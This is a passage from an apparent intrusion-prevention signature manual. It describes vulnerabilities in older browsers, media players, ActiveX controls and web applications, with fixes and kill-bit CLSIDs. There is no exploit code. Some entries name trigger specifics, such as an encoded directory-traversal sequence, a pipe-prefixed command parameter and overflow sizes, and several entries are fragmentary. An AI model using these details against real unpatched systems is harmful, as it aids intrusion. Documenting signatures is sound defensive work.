view-source: or jar: pseudo-protocol. A remote attacker can create a specially-crafted view-source: or jar: protocol
URL and embed a malicious JavaScript URL which, once the victim loads the file, would allow the attacker to execute
arbitrary code on the system with privileges of the victim's system. Mozilla Suite versions 1.x and below are prone to
this vulnerability. Update the Mozilla Firefox suite with versions 2.x and above to resolve this issue.
Signature ID: 1447
MSIE JPEG Image Rendering Library Memory Corruption Vulnerability
Signature Description: The Image rendering library is used to display JPEG files in Internet Explorer doesn't properly
handle crafted JPEG images. The vulnerability specifically exists in mshtml.dll due to a lack of boundary checks in the
JPEG decoder functions. A remote attacker can create a malicious JPEG image which, once the image is viewed, could
allow the attacker to execute arbitrary code on the system with privileges of the victim or create a denial of service
condition. An attacker could exploit this vulnerability by creating a malicious Web page or an HTML e-mail message
and then persuading the user to visit the page or to view the HTML e-mail message. Microsoft Internet Explorer
versions 5.x of SP1 to SP4 are prone to this vulnerability. Administrators are advised to install the updates mentioned
in MS05-038.
210
Signature ID: 1448
Microsoft Internet Explorer JPEG Image Rendering Library Memory Corruption Vulnerability
Signature Description: The Image rendering library that is used to display JPEG files in Internet Explorer doesn't
properly handle crafted JPEG images. The vulnerability specifically exists in mshtml.dll due to a lack of boundary
checks in the JPEG decoder functions. A remote attacker can create a malicious JPEG image which, once the image is
viewed, could allow the attacker to execute arbitrary code on the system with privileges of the victim or create a denial
of service condition. An attacker could exploit this vulnerability by creating a malicious Web page or an HTML e-mail
message and then persuading the user to visit the page or to view the HTML e-mail message. Microsoft Internet
Explorer with version 5.x series of SP1, SP2 ,SP3,SP4 are prone to this vulnerability. Administrators are advised to
install the updates mentioned in MS05-038.
Signature ID: 1449
RealNetworks RealPlayer vidplin.dll AVI file Processing Heap Overflow Vulnerability
Signature Description: Real Networks' Real Player is a streaming audio and video player for Microsoft Windows
platforms. Real Player is vulnerable to a heap overflow while processing specially crafted AVI files. The vulnerability
specifically exists in vidplin.dll which is called by Real Player while processing AVI files. The Microsoft AVI file
format is a RIFF file specification used with applications that capture, edit, and play back audio-video sequences. In
general, AVI files contain multiple streams of different types of data. The stream format chunk (strf) describes the
format of the data in the stream. Real Player relies on a strf structure value and allocates a fixed memory space of
0x428 bytes to copy the data of strf chunk from the AVI file. By constructing a crafted AVI file with strf chunk size
more than 0x428 bytes and convincing a user to view the file in Real Player can cause the overflow in vidplin.dll. The
vulnerability allows a remote attacker to reliably overwrite heap memory with arbitrary data and execute arbitrary code
in the context of the user who executed the player.Real Networks RealPlayer versions prior to 10.5 have this
vulnerability.
Signature ID: 1450
ViRobot Linux Server addschup Binary Cookie Overflow vulnerability
Signature Description: ViRobot Linux Server is an anti-virus protection file server that runs on Linux-based operating
systems. ViRobot Linux Server is prone to a remote buffer overflow vulnerability affecting the Web based
management interface. The problem is caused by improper bounds checking of cookies sent to the setuid cgi-bin file,
addschup. Other binaries may also affected. A remote attacker can exploit this vulnerability by sending a malicious
request to addschup binary with Cookie field containing the overflow string and arbitrary commands. Successful
exploitation may insert arbitrary commands into the user's crontab file thus executing the commands at regular
intervals.
Signature ID: 1451
Microsoft DirectX DirectShow AVI File Buffer Overflow Vulnerability
Signature Description: Microsoft DirectShow is used for streaming media on Microsoft Windows operating systems.
DirectShow is integrated with DirectX technologies. A buffer overflow vulnerability exists in Microsoft Windows
DirectShow component when processing AVI (Audio Visual Interleave) media files. The Microsoft AVI file format is
a RIFF file specification used with applications that capture, edit, and play back audio-video sequences. In general,
211
AVI files contain multiple streams of different types of data. The stream name chunk (strn) contains a name for the
stream. Windows Media Player uses QUARTZ.DLL (DirectShow runtime library) to decode and play AVI movie files.
Attackers could craft a malicious AVI file that has a malformed stream name chunk (strn) and a special length field
value and when this file is processed by DirectShow due to lack of validation, QUARTZ can be made to store a null
byte to an arbitrary memory location. This actually affects the heap management code allowing attackers to modify the
heap block header and write a null byte, and other instructions, to arbitrary memory. Successful exploitation will permit
execution of arbitrary code in the context of the user who opens the malicious avi file. Administrators are advised to
install the patches mentioned in MS05-050 bulletin.
Signature ID: 1452
Microsoft Windows Graphics Rendering Engine WMF/EMF Integer Overflow Vulnerability
Signature Description: The Microsoft Windows Graphics Rendering Engine supports a number of image formats
including Windows Metafile (WMF) and Enhanced Meta file (EMF). Windows Meta file (WMF) is a graphics file
format on Microsoft Windows systems. It is a vector graphics format which also allows the inclusion of raster graphics.
WMF is a 16-bit format introduced in Windows 3.0, a newer 32-bit version with additional commands is called
Enhanced Meta file (EMF). A WMF/EMF file stores a list of function calls that have to be issued to the Windows
graphics layer GDI in order to restore the image. Graphics rendering engine in Windows is vulnerable to several integer
overflows while processing specially crafted WMF/EMF files. The flaw is due to improper validation on the original
header values in a WMF/EMF file. Therefore large header values could result in an integer overflow during the size
calculation. This mis-represented integer may then be used to allocate stack space, resulting in a buffer overflow when
the data is copied. An attacker could exploit this vulnerability by sending the malicious image to a victim as an email
attachment and tricking the victim into opening the attachment or by hosting it on a Web site and persuading the victim
to visit the Web site.
Signature ID: 1453
Microsoft Windows Graphics Rendering Engine WMF/EMF Integer Overflow Vulnerability
Signature Description: The Microsoft Windows Graphics Rendering Engine supports a number of image formats
including Windows Meta file (WMF) and Enhanced Meta file (EMF). Windows Meta file (WMF) is a graphics file
format on Microsoft Windows systems. It is a vector graphics format which also allows the inclusion of raster graphics.
WMF is a 16-bit format introduced in Windows 3.0, a newer 32-bit version with additional commands is called
Enhanced Meta file (EMF). A WMF/EMF file stores a list of function calls that have to be issued to the Windows
graphics layer GDI in order to restore the image. Graphics rendering engine in Microsoft Windows 2000 SP4, 2003
SP1, XP SP2 and prior service packs versions are vulnerable to several integer overflows while processing specially
crafted WMF/EMF files. The flaw is due to improper validation on the original header values in a WMF/EMF file.
Therefore large header values could result in an integer overflow during the size calculation. This mis-represented
integer may then be used to allocate stack space, resulting in a buffer overflow when the data is copied. An attacker
could exploit this vulnerability by sending the malicious image to a victim as an email attachment and tricking the
victim into opening the attachment or by hosting it on a Web site and persuading the victim to visit the Web site.
Signature ID: 1454
Microsoft Windows Client/Server Runtime Server Subsystem Stack Overflow Vulnerability
Signature Description: The Win32 application-programming interface (API) offers a console windows feature that
provides a means to implement command-line and other character-based user interfaces. Console windows are
managed by Client/Server Runtime Server (csrss.exe) subsystem, specifically by code inside winsrv.dll. This module
212
handles the creation of console windows and the properties associated with the windows such as size, font, color, etc.
Console windows properties can be set by selecting Properties on window system menu, setting the values you want
and then saving the changes. When a user selects the "Properties" item from the menu of a console window, a data
structure called CONSOLE_STATE_INFO containing information about the console window is copied into the filemapping object. The CONSOLE_STATE_INFO data structure contains a null terminated string specifying the name of
a font, FaceName[32]. This string is copied into a fixed sized stack buffer without any sanity checking via the wcscpy()
function. By supplying a string longer than 32 bytes, an attacker can trigger the stack-based buffer overflow to gain
control of the computer and eventually execute arbitrary code. A local attacker, who is authenticated, could run a
specially-crafted application to gain elevated privileges and complete control of the system. A remote attacker can
exploit this issue by crafting a malicious shortcut (.lnk) file and placing it on a Web site or sending it to a user through
email followed by enticing them to open it and view the file's properties.
Signature ID: 1455
Mozilla Firefox 'Set As Wallpaper' Javascript Execution Vulnerability
Signature Description: Mozilla is an open-source Web browser for Microsoft Windows and Linux-based operating
systems. Mozilla Firefox versions 1.0.3 and 1.0.4 could allow a remote attacker to execute arbitrary code caused by a
vulnerability in the Set As Wallpaper context menu. The "Set As Wallpaper" dialog takes the image url as a parameter
without validating it. If an attacker can convince a victim to use the "Set As Wallpaper" context menu item on a
specially crafted image containing image source as a javascript: url (like <img src="javascript:) with an eval()
statement then they can run arbitrary code on the user's computer. Users are advised to upgrade to newer version of
Mozilla Firefox. This vulnerability have been addressed in Firefox 1.0.5 and in Mozilla Suite 1.7.9
Signature ID: 1456
NullSoft Winamp ID3v2 Tag Buffer Overflow Vulnerability
Signature Description: Winamp is a multimedia player made by Nullsoft. ID3v2 is a metadata container most often
used in conjunction with the MP3 audio file format. It allows information such as the title, artist, album, track number,
or other information about the file to be stored in the file itself. Winamp versions 5.03a, 5.09, and 5.091 are reported
vulnerable to a buffer overflow vulnerability when processing ID3v2 tags of mp3 files. A remote attacker can create a
MP3 file with malicious ID3v2 tag such as ARTIST (TPE1) specifying a large string to it. When the target user adds
plays the file in his Winamp playlist, arbitrary code will get executed when the file is finished playing. Users are
advised to upgrade t the newer version of Winamp. Other versions are also likely affected.
Signature ID: 1457
NullSoft Winamp ID3v2 Tag Buffer Overflow Vulnerability
Signature Description: Winamp is a multimedia player made by Nullsoft. ID3v2 is a meta data container most often
used in conjunction with the MP3 audio file format. It allows information such as the title, artist, album, track number,
or other information about the file to be stored in the file itself. Nullsoft Winamp 5.0.91 and prior versions are
vulnerable to a buffer overflow vulnerability when processing ID3v2 tags of mp3 files. A remote attacker can create a
MP3 file with malicious ID3v2 tag such as ARTIST (TPE1) or TITLE (TOPE) specifying a large string for them.
When the target user adds the file to their Winamp playlist and then plays the file, arbitrary code will get executed
when the file is finished playing. Users are advised to upgrade to the newer version of Winamp.
213
Signature ID: 1458
Microsoft Internet Explorer CHM File Execution via URL specified for ShowHelp Method
Vulnerability
Industry ID: CVE-2003-1014 CVE-2004-0475 CVE-2004-0201 CVE-2003-1041 Bugtraq: 9320,10348,10705
Signature Description: Microsoft Internet Explorer is vulnerable to a file execution vulnerability that may permit
unauthorized execution of locally stored compiled help files (.CHM). ShowHelp() method is used to launch the Help
file with the local HTML Help Windows application. The vulnerability specifically exists in ShowHelp() function
which can reference local compiled help files without any problem. By making use of other vulnerabilities a remote
attacker can plant a .CHM file on victim machine and that file can be executed with the help of this vulnerability. This
vulnerability can be exploited by constructing a web page that contains a reference to already planted .CHM file using
ShowHelp method which takes argument of the help file as an argument. The location of CHM file can be mentioned
by using HTML protocol which takes the form ms-its: or mk:@MSITStore: to ShowHelp method. It is also possible to
refer the CHM file by using directory traversal techniques and special syntax. Exploitation of this vulnerability would
require the user to visit a malicious website or otherwise visit a crafted URL and then take several interactive steps.
Signature ID: 1459
Microsoft Internet Explorer InstallEngineCtl SetCifFile Argument Buffer Overflow
Vulnerability
Signature Description: Active Setup Technology in Microsoft Internet Explorer allows an installation program to
receive additional files from the Internet that are needed for program initialization. The Install Engine ActiveX control
(inseng.dll) module, which is part of the Active SetUp technology, contains a buffer overflow. The Active Setup
Controls ActiveX component 'asctrls.ocx' provides the properties BaseUrl and SetCifFile. BaseUrl takes one argument
which is the path where we will find downloaded components including cabinet files and SetCifFile takes two
arguments a cabinet file and a component information file to set the component information file (.cif). When calling the
SetCifFile() method if the first parameter (the '.cab' file name) is a string of length in excess of about 2kb, an integer
overflow occurs when attempting to calculate the buffer space allowed for copying the base url. This also leads to a
heap based overflow when the string provided as first parameter is concatenated onto the end of the BaseUrl.
Successful exploitation could execute arbitrary code with the privileges of the user logged on to the target machine. An
attacker could exploit this vulnerability by hosting the malicious Web page on a Web site or by sending it to a victim as
an HTML email. Administrators are advised to install the updates mentioned in MS04-038 or alternately user can set
killbit to the clsid 6E449683-C509-11CF-AAFA-00AA00B6015C to resolve this issue.
Signature ID: 1460
Microsoft Internet Explorer InstallEngineCtl SetCifFile Argument Buffer Overflow
Vulnerability
Signature Description: Active Setup Technology in Microsoft Internet Explorer allows an installation program to
receive additional files from the Internet that are needed for program initialization. The Install Engine ActiveX control
(inseng.dll) module, which is part of the Active Set Up technology, contains a buffer overflow. The Active Setup
Controls ActiveX component 'asctrls.ocx' provides the properties BaseUrl and SetCifFile. BaseUrl takes one argument
which is the path where we will find downloaded components including cabinet files and SetCifFile takes two
arguments a cabinet file and a component information file to set the component information file (.cif). A .cif file
specifies all the files needed to install or update the software. When calling the SetCifFile() method if the first
parameter (the '.cab' file name) is a string of a length in excess of about 2kb, an integer overflow occurs when
214
attempting to calculate the buffer space allowed for copying the base url. This also leads to a heap based overflow
when the string provided as first parameter is concatenated onto the end of the BaseUrl. Successful exploitation could
execute arbitrary code with the privileges of the user logged on to the target machine. An attacker could exploit this
vulnerability by hosting the malicious Web page on a Web site or by sending it to a victim as an HTML email.
Signature ID: 1461
Microsoft Internet Explorer ShowModalDialog Security Zone Bypass Vulnerability
Signature Description: Internet Explorer security zones are part of a system that divides online content into categories
or zones that are based on the trustworthiness of the content. Specific Web domains can be assigned to a zone,
depending on how much trust is placed in the content of each domain. The zone then restricts the capabilities of the
Web content, based on the zone's policy. By exploiting this vulnerability, java script can be injected and can be
executed within the victim's "My Computer" security zone. An IFRAME object is created for a web page which will
change its security zone by making use of the Location: weakness. When the location of the content of a frame is
changed with an HTTP redirect response, a modal dialog box that was called from the frame before the redirect will
return a cached reference to the frame's original domain. IE then incorrectly considers the cached domain instead of the
redirected domain when determining the security domain of the modal dialog box. Also, since the contents of the frame
have been changed by the redirect, it is possible to set the location object of the frame. By redirecting to a local
resource, controlling the timing of the redirect, and setting the frame's location to a javascript: protocol URL, an
attacker can execute script in the security context of the Local Machine Zone. Scob Trojan, Download.Ject, Toofeer,
Berbew, IE ILookup Trojans make use of this vulnerability to affect systems. Administrators are advised to install the
updates mentioned in MS04-025.
Signature ID: 1462
RealNetworks RealOnePlayer and RealPlayer PNen3260.DLL Integer Overflow Vulnerability
Inc. RealPlayer 10.5 and prior versions are vulnerable to arbitrary code execution vulnerability. An integer overflow
vulnerability exists in pnen3260.dll file which handles .rm files in Real Player. The vulnerability is triggered by setting
the length field of the VIDORV30 data chunk to a large value. Remote attackers could exploit this vulnerability to
execute arbitrary code on an affected system by enticing a victim to play a specially crafted SMIL file that contains a
link to malicious .rm file. Users are advised to upgrade to newer version of real player.
Signature ID: 1463
Winamp Fasttracker 2 Plug-In in_mod.dll Overflow Vulnerability
Signature Description: This rule gets hit when an attempt is made to download Extended Module files (.XM) from
Internet. NullSoft Winamp versions 5.02 and prior is vulnerable to a heap overflow while processing a XM media file.
The vulnerability specifically exists in 'in_mod.dll' component which is responsible for loading the XM files. By
creating a specially crafted XM file with fields containing long values and convincing a user to load the file in
Winamp, buffer can be overflown to execute arbitrary code. Users are advised to upgrade to newer version of Winamp.
Signature ID: 1501
Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
215
Signature Description: A vulnerability in the default installation of Apache HTTP Server versions 2.0 through 2.0.39
could allow a remote attacker to traverse directories on the Web server and view and execute files. A remote attacker
could create a specially-crafted URL request containing hexadecimal URL encoded "backslash dot dot" sequences (in
the form of 5c%2e%2e%5c) to traverse directories and view arbitrary files and directories on the Web server. An
attacker could use this vulnerability to execute commands on the system by traversing to the /cgi-bin/ directory.
Signature ID: 1502
Squid cachemgr.cgi Unauthorized Connection Vulnerability
Signature Description: Squid is a high-performance proxy caching server for web clients, supporting FTP, gopher, and
HTTP data objects. The 'cachemgr.cgi' module is a management interface for the Squid proxy service. It was installed
by default in '/cgi-bin' by Red Hat Linux 5.2 and 6.0 installed with squid with no access controls, a remote attacker to
connect to arbitrary hosts and ports which could be used it as an intermediatary to connect to other systems.
Signature ID: 1503
Cart32 "expdate" Administrative Information Disclosure Vulnerability
Signature Description: Cart32 is shopping cart software(developed by McMurtrey/Whitaker & Associates) built for
Microsoft Server using Visual Basic, a MySQL database, and HTML components. A vulnerability in the cart32.exe
CGI executable could allow a remote attacker to retrieve sensitive information about the server installation, including
environment settings and a list of programs in the CGI-BIN directory. A remote attacker could exploit this vulnerability
by appending the string "/expdate" to a request for the cart32.exe CGI, an attacker to access an error message followed
by a debugging page containing the server variables, the Cart32 administration directory and possibly the contents of
the cgi-bin. Vulnerable versions are McMurtrey/Whitaker & Associates Cart32 3.0 and 2.6. No remedy available as of
August 2008.
Signature ID: 1504
Microsoft Internet Explorer FILEX Information Disclosure Vulnerability
Signature Description: Filex (File Extension Database)consists of file name extension-related information in the form
of a Windows HTML Help file. Internet Explorer 5.0 browser is vulnerable. This vulnerability is due to improper
handling of request, it may leak sensitive information when accessed from Internet Explorer. A successful exploitation
of this vulnerability allow an attacker to gain sensitive information on the vulnerable system. This vulnerability is fixed
in latest versions. Administrators are advised to update latest version to resolve this issue. 
Signature ID: 1506
Microsoft Windows HTML Converter HR Align Buffer Overflow Vulnerability
Signature Description: HTML converter is an extension which allows applications to convert HTML data into Rich
Text Format(RTF) while maintaining the formatting and sturcture of the data as well as the text. The converter also
supports the conversion of RTF data into HTML. Microsoft Internet Explorer (Microsoft Internet Explorere version 5
and 6) is vulnerable to a stack-base buffer overflow in the HTML coversion library(html32.cnv). By creating a new
HTML document and opening it in a frame off screen, writing a specilly-crafted 'align' element in an <HR>(Horizontal
Rule) tag to the document, a remote attacker could overflow a buffer and execute arbitrary code on the system with
privileges of the victim. An exploit trigers when the malicious web page or file on a Web site or by sending it to a
victim as an HTML email.
216
Signature ID: 1507
Microsoft Internet Explorer Object Type Validation Vulnerability
Signature Description: Microsoft Internet Explorer is the most widely used World Wide Web browser. It was
developed by Microsoft. Microsoft Internet Explorer(IE) will execute an HTML Application referenced by the DATA
attribute of an OBJECT element. OBJECT element as a way to embed ActiveX controls. The DATA attribute is a URI
that provides the data for an object. Microsoft Internet Explorer (Microsoft Internet Explorer versions 5.01,5.5, and 6)
does not properly determine object data tags. A remote attacker could create a specially-crafted URL link using the
Object Data tags, which would be executed in the victim's web browser within the security context of the hosting site,
once the link is clicked. An attacker could exploit this vulnerability by sending it to a victim as an HTML email.
Signature ID: 1510
Lupper worm - AWStats configdir Parameter Input Validation Flaw
Signature Description: Lupper is a worm. The worm will infect Linux systems and spreads through web servers by
exploiting AWStats Rawlog Plugin Input Vulnerability. This worm will not infect windows system. It sends random
http requests on port 80. If any web server is vulnerable, it will exploit the vulnerabilities and downloads a copy of
itself into the web server. It also sends some pre-configured list of commands to the awstats scripts. AWStats is a Perl
CGI script that collects and graphically displays statistics from web, FTP, and mail servers. AWStats versions prior to
6.3 are vulnerable to an input validation flaw which allows remote attackers to execute arbitrary comands under the
privileges of the web server. The problem exists in the 'awstats.pl' perl script which takes the parameter 'configdir' as
user-supplied input. Due to the lack of input validation on the configdir parameter a remote attacker can supply this
parameter with arbitrary commands prefixed with the '|' character which leads to execution of those command.
Signature ID: 1511
RealNetworks RealOne Player/RealPlayer SMIL File Remote Stack Based Buffer Overflow
Vulnerability
Inc. RealPlayer is vulnerable to a stack based buffer overflow vulnerability due to a lack of boundary checks performed
by the application when parsing Synchronized Multimedia Integration Language (SMIL) files. An attacker can exploit
this vulnerability using a specially crafted .smil file by setting the system-screen-size parameter to a string of more than
256 bytes. Successful exploitation allows arbitrary code execution. Vulnerable to Real Player 8 or above in Windows
and Real Player 10 in Linux/Mac.
Signature ID: 1512
Internet explorer WebViewFolderIcon setSlice code Execution Vulnerability
Signature Description: Microsoft Internet Explorer is the most widely used World Wide Web browser. It is developed
by Microsoft. Microsoft Internet Explorer (Microsoft Internet Explorer version 6 on Windows XP SP2) is a integer
underflow vulnerability. Microsoft WebViewFolderIcon object is an ActiveX control is provided by the file webvw.dll.
By passing a malformed WebViewFolderIcon ActiveX Object(webvw.dll) with an invalid argument(0x7ffffff) to the
"setslice()" method, a remote attacker could exploit this vulnerability to execute arbitrary code on the victim's system or
cause the victim's browser to crash. Apply the updates listed in Microsoft Security Bulletin MS06-057.
217
Signature ID: 1513
Internet explorer WebViewFolderIcon ActiveX Code Execution Vulnerability(1)
By passing a malformed WebViewFolderIcon ActiveX Object(webvw.dll) with an invalid argument to the "setslice()"
method, a remote attacker could exploit this vulnerability to execute arbitrary code on the victim's system or cause the
victim's browser to crash. Apply the updates listed in Microsoft Security Bulletin MS06-057 or set the kill bit for
CLSID 844F4806-E8A8-11d2-9652-00C04FC30871
Signature ID: 1514
Internet explorer WebViewFolderIcon ActiveX Code Execution Vulnerability(2)
By passing a malformed WebViewFolderIcon ActiveX Object(webvw.dll) with an invalid argument to the "setslice()"
method, a remote attacker could exploit this vulnerability to execute arbitrary code on the victim's system or cause the
victim's browser to crash. Apply the updates listed in Microsoft Security Bulletin MS06-057 or set the kill bit for
CLSID E5DF9D10-3B52-11D1-83E8-00A0C90DC849.
Signature ID: 1521
Cisco IOS Software HTTP Request Denial of Service Vulnerability
Signature Description: Cisco IOS is the operating system used on a vast majority of Cisco Systems routers and all
current Cisco network switches. The HTTP server in Cisco IOS 12.0 through 12.1 allows local users to cause a denial
of service (crash and reload) via a URL containing a "?/" string. The device will enter an infinite loop when supplied
with a URL containing a "?/" and an enable password. Subsequently, the router will crash in two minutes after the
watchdog timer has expired and will then reload. In certain cases, the device will not reload and a restart would be
required.
Signature ID: 1525
Microsoft XML Core Service XMLHTTP ActiveX Control Remote Code Execution
Vulnerability
Signature Description: Microsoft XML Core Services (MSXML) allow developers who use applications such as
JScript, Visual Basic Scripting Edition (VBScript), and Microsoft Visual Studio to create XML-based applications.
MSXML includes the XMLHTTP ActiveX control, which allows web pages to transmit or receive XML data via
HTTP operations. The XMLHTTP 4.0 ActiveX control contains an unspecified memory corruption vulnerability. By
persuade the victim to visit a Web page containing %u encoded malicious data attacker can execute arbitrary code in
victim machine. Apply the available patch provided by vendor or alternately user can set a kill bit to the clsids
88d969c5-f192-11d4-a65f-0040963251e5 and 88d96a0a-f192-11d4-a65f-0040963251e5
218
Signature ID: 1526
Vulnerability
HTTP operations. The XMLHTTP 4.0 ActiveX control contains an unspecified memory corruption vulnerability. A
remote attacker could exploit this vulnerability to execute arbitrary code on a victim's system, if the attacker could
persuade the victim to visit a Web page containing hex encoded malicious data . Apply the available patch provided by
vendor or alternately user can set a kill bit to the clsids 88d969c5-f192-11d4-a65f-0040963251e5 and 88d96a0a-f19211d4-a65f-0040963251e5
Signature ID: 1527
Vulnerability
HTTP operations. The XMLHTTP 4.0 ActiveX control contains an unspecified memory corruption vulnerability. A
remote attacker could exploit this vulnerability to execute arbitrary code on a victim's system, if the attacker could
persuade the victim to visit a Web page containing a malicious XMLHTTP ActiveX control. Microsoft has released
updates in Microsoft Security Bulletin MS06-071 to address this issue. This Signature detects the Progid.
Signature ID: 1528
WinZip FileView ActiveX Control Unsafe filepattern() Method Exposure Vulnerability(1)
Signature Description: Winzip is a proprietary file archiver and compressor for Microsoft windows, developed by
WinZip Computing (Nico Mak Computing). Winzip's FileView ActiveX control version 10.0 prior to Build 7245 is
vulnerable to a stack-based buffer overflow. By persuading a victim to visit a specially-crafted web page that passes an
overly long string to the filepattern() method, a remote attacker could overflow a buffer and execute arbitrary code on
the system with the privileges of the user or cause the victim's browser to crash. As a workaround set the kill bit for
affected ActiveX control A09AE68F-B14D-43ED-B713-BA413F034904.
Signature ID: 1529
vulnerable to a stack-based buffer overflow. By persuading a victim to visit a specially-crafted web page that passes the
progid WZFILEVIEW.FileViewCtrl.61 via insecure filepattern() method, a remote attacker could overflow a buffer
and execute arbitrary code on the system with the privileges of the user or cause the victim's browser to crash.
219
Signature ID: 1530
vulnerable to a stack-based buffer overflow. By persuading a victim to visit a specially-crafted web page that passes the
classid, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the
user or cause the victim's browser to crash. As a workaround set the kill bit for affected ActiveX control A09AE68FB14D-43ED-B713-BA413F034904.
Signature ID: 1531
Acer LunchApp.APlunch ActiveX Control Run Insecure Method Exposure Vulnerability(1)
Signature Description: Acer LunchApp ActiveX control is provided by LuchApp.ocx. Acer laptops could allow a
remote attacker to execute arbitrary commnads on the system, caused by the use of the insecure "Run()" method by the
LuchApp.ApLunch ActiveX control. A remote attacker could exploit this vulnerability to by creating a malicious Web
page and persuading a victim to visit the page. The affected versions are Acer Aspire 5600 and Acer TravelMate 4150.
No remedy available. User can set the kill bit for CLSID.
Signature ID: 1532
remote attacker to execute arbitrary commands on the system, caused by the use of the insecure "Run()" method by the
No remedy available. This rule detects the Progid(LunchApp.APlunch).
Signature ID: 1533
remote attacker to execute arbitrary commnads on the system, caused by the use of the insecure "Run()" method by the
No remedy available. User can set the kill bit for CLSID. This signature detect only classid.
Signature ID: 1534
Altnet Download Manager Buffer Overflow Vulnerability(1)
Signature Description: This vulnerability is caused due to a boundary error within the IsValidFile() method in the
ADM ActiveX control. This can be exploited to cause a stack-based buffer overflow via a malicious web site by
passing an overly long string to the bstrFilepath parameter.The application is included in the file-sharing applications
220
Kazaa and Grokster. Vulnerable to Altnet Download Manager 4.0.0.2 and prior, Altnet Download Manager 4.0.0.4. No
remedy available as of July 6, 2008.
Signature ID: 1535
ADM ActiveX control.This can be exploited to cause a stack-based buffer overflow via a malicious web site by passing
an overly long string to the bstrFilepath parameter.The application is included in the file-sharing applications Kazaa
and Grokster. Vulnerable to Altnet Download Manager 4.0.0.2 and prior, Altnet Download Manager 4.0.0.4. This rule
detects the Progid and method. No remedy available as of July 6, 2008.
Signature ID: 1536
ADM ActiveX control. This can be exploited to cause a stack-based buffer overflow via a malicious web site by
passing an overly long string to the bstrFilepath parameter.The application is included in the file-sharing applications
Kazaa and Grokster. Vulnerable to Altnet Download Manager 4.0.0.2 and prior, Altnet Download Manager 4.0.0.4.
This rule detects the Classid. No remedy available as of July 6, 2008.
Signature ID: 1537
Microsoft Internet Explorer ADODB.Connection Execute() Memory Corruption
Vulnerability(1)
Signature Description: Microsoft ActiveX Data Objects (ADO) are objects that expose data raised by an underlying
OLE DB provider. The ADODB.Connection ActiveX control (ADODB.Connection.2.7 and ADODB.Connection.2.8)
are vulnerable to a memory corruption via Execute method. A remote attacker could exploit this vulnerability by
creating a specially-crafted Web page, and persuading a victim to visit the page. User can update the available patches.
Alternatively user can set the kill bit for ADODB.connection Activex control CLSID 00000535-0000-0010-800000AA006D2EA4.
Signature ID: 1538
Vulnerability(2)
This signature detects the Progid(ADODB.Connection).
221
Signature ID: 1539
Vulnerability(3)
Alternatively user can set the kill bit for ADODB.connection ActiveX control CLSID 00000535-0000-0010-800000AA006D2EA4.
Signature ID: 1540
QuickTime Media Link(qtl) arbitrary Script inclusion vulnerability
Signature Description: The vulnerability is caused by a quite useful feature called QuickTime Media Link (.qtl).
QuickTime Media Link files are used to play media files in a more accessible way. A malicious user can create a .qtl
file which can contain JavaScript code that can takeover some important network device when executed. QuickTime
doesn't mind if Media Link (.qtl) files end with .mp3, .mp4, .m4a or even .mov extension. Vulnerable Platforms are
openSUSE 10.2, openSUSE 10.3, SUSE Linux 10, SUSE Linux 10.1, SUSE Linux Enterprise Server 10, SuSE Linux
Enterprise Server 8, SUSE Linux Enterprise Server 9, SuSE Linux Openexchange Server 4.x, UnitedLinux 1.0 and
Mozilla Firefox.
Signature ID: 1541
RealPlayer IERPPLUG.DLL ActiveX Control Remote Denial of Service Vulnerability(1)
Signature Description: RealPlayer is a media player. RealPlayer ActiveX control allows users to stream various media
files through their web browser. Realplayer activex control(RealPlayer 10.5) is vulnerable to a buffer overflow caused
by improper bounds checking by OpenURLInPlayerBrowser() method. A remote attacker could overflow a buffer and
execute arbitrary code on the system with the privileges of the victim or cause the victim's browser to crash. User can
set the killbit for CLSID FDC7A535-4070-4B92-A0EA-D9994BCC0DC5 to disable this ActiveX. No update is
available as of 2008.
Signature ID: 1542
RealPlayer IERPPLUG.DLL ActiveX Control Remote Denial of Service Vulnerability(2)
Signature Description: RealPlayer is a media player. RealPlayer ActiveX control allows users to stream various media
files through their web browser. Realplayer activex control(RealPlayer 10.5) is vulnerable to a buffer overflow caused
by improper bounds checking by OpenURLInPlayerBrowser() method. A remote attacker could overflow a buffer and
execute arbitrary code on the system with the privileges of the victim or cause the victim's browser to crash. No update
is available as of 2008. This Signature detects the progid(IERPCtl.IERPCtl).
222
Signature ID: 1543
Microsoft Internet Explorer DXImageTransform.Microsoft.Light ActiveX Arbitrary Code
Execution Vulnerability(1)
Signature Description: Microsoft Directx is a collection of industry-leading technologies designed to deliver the most
advanced, stable, and visually impressive graphics experience on Microsoft platforms. Microsoft Internet Explorer
(Microsoft Internet Explorer versions 5.01 SP4, 6, 6 SP1) is a memory corruption vulnerability in the DXImage
Transform.Microsoft.Light ActiveX control. By persuading a malicious web page that passes a specially-crafted data to
the affected control, a remote attacker could execute arbitrary commands on a victim's system with privileges of the
victim.
Signature ID: 1544
Microsoft Internet Explorer DXImageTransform.Microsoft.Light ActiveX Arbitrary Code
Execution Vulnerability(2)
(Microsoft Internet Explorer versions 5.01 SP4, 6, 6 SP1) is a memory corruption vulnerability in the DXImage
Transform.Microsoft.Light ActiveX control. By persuading a malicious web page that passes a specially-crafted data to
the affected control, a remote attacker could execute arbitrary commands on a victim's system with privileges of the
victim. This Signature detects the Progid(DXImageTransform.Microsoft.Light).
Signature ID: 1545
Microsoft Internet Explorer DXImageTransform.Microsoft.MMSpecialEffect1Input ActiveX
Arbitrary Code Execution Vulnerability
(Microsoft Internet Explorer versions 5.01 SP4, 6, 6 SP1) is a memory corruption vulnerability regarding the handling
of COM objects. By persuading a malicious web page containing an invalid DXImage
Transform.Microsoft.MMSpecialEffect1Input ActiveX object, a remote attacker could execute arbitrary code and gain
complete control over the victim's system.
Signature ID: 1546
Microsoft Internet Explorer DXImageTransform.Microsoft.MMSpecialEffect2Inputs ActiveX
Arbitrary Code Execution Vulnerability
Transform.Microsoft.MMSpecialEffect2Input ActiveX object, a remote attacker could execute arbitrary code and gain
complete control over the victim's system.
223
Signature ID: 1547
Microsoft Internet Explorer DXImageTransform.Microsoft.MMSpecialEffectInplace1Input
ActiveX Arbitrary Code Execution Vulnerability
Transform.Microsoft.MMSpecialEffectInplace1Input ActiveX object, a remote attacker could execute arbitrary code
and gain complete control over the victim's system.
Signature ID: 1548
Microsoft Internet Explorer Mdt2dd.dll Insecure COM Instantiation Vulnerability
of COM objects in Mdt2dd.dll, Mdt2gddr.dll, Mdt2gddo.dll. By persuading a victim to visit a specially-crafted web
page containing an invalid COM objects, a remote attacker could execute arbitrary code and gain complete control over
the victim's system.
Signature ID: 1549
Novell SUSE Linux Enterprise Server Remote Manager Heap Overflow Vulnerability
Signature Description: Novell SUSE Linux Enterprise Server is a platform for open source computing in an enterprise
